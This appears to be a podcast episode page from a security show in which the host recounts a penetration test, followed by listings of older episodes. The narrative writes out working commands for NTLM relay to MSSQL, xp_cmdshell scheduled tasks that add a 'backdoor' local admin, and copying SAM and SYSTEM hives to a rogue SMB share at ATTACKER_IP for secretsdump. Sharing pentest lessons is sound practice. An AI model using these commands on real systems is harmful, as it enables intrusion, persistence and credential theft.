7MS #692: Tales of Pentest Pwnage – Part 76
7 Minute Security12 Syys

7MS #692: Tales of Pentest Pwnage – Part 76

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else:

I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.

I relayed the DA account to a SQL box that BloodHound said had a "session" from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".

Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy.

In the end, the bizarre combo of things that did the trick was:

  • Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
  • From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
  • From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
  • Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed!
  • I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
  • Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Jaksot(706)

7MS #137: OFFTOPIC-Welcome to Leith

7MS #137: OFFTOPIC-Welcome to Leith

This off-topic episode talks about one of the most gripping and disturbing documentaries I've ever seen. Welcome to Leith, in a nutshell, asks the question: What would you do if a white supremacist group moved in next door?

6 Tammi 20168min

7MS #136: Python for Newbs

7MS #136: Python for Newbs

One skill that's been kind of a hinderance in my IT/security career is I have exactly zero experience in programming/coding. Zero. Zip. Nil. Nada. Nothing.. But I'm trying to remedy that in 2016 by learnin' me some Python, and I picked up a great book called Python Crash Course, which has been exactly what this newb needed. At the time of publishing, you can get 30% off with the coupon code CRASHCOURSE!

5 Tammi 20169min

7MS #135: I Got a New Job - Part 4

7MS #135: I Got a New Job - Part 4

This is a four-part series about my transition to a new job! The topics are as follows: * Part 1: When it may be time to look for a new job (or not) * Part 2: How to stand out during phone screenings and interviews * Part 3: How to gracefully transition from old job to new job * Part 4: Here's what I'm doing in my new gig!

4 Tammi 20168min

7MS #134: I Got a New Job - Part 3

7MS #134: I Got a New Job - Part 3

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

1 Tammi 20169min

7MS #133: I Got a New Job - Part 2

7MS #133: I Got a New Job - Part 2

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

1 Tammi 20168min

7MS #132: I Got a New Job - Part 1

7MS #132: I Got a New Job - Part 1

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

1 Tammi 20167min

7MS #131: How to Attempt a Two Week Pentest in Two Days

7MS #131: How to Attempt a Two Week Pentest in Two Days

The title says it all. I had two days to pentest a network that probably would've taken two or more people two weeks or more. I laughed. I cried. I had fun.

30 Joulu 20158min

7MS #130: Sqlmap and Sqlninja FTW

7MS #130: Sqlmap and Sqlninja FTW

This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.

29 Joulu 20157min

Suosittua kategoriassa Politiikka ja uutiset

rss-ootsa-kuullut-tasta
aikalisa
tervo-halme
ootsa-kuullut-tasta-2
politiikan-puskaradio
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
otetaan-yhdet
rss-podme-livebox
aihe
viisupodi
linda-maria
rss-hyvaa-huomenta-bryssel
rss-50100-podcast
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
mtv-uutiset-polloraati
radio-antro
rss-kaikki-paskaksi-ystavat
rss-polikulaari-humanisti-vastaa-ja-muut-ts-podcastit
rss-tekoalyfoorumi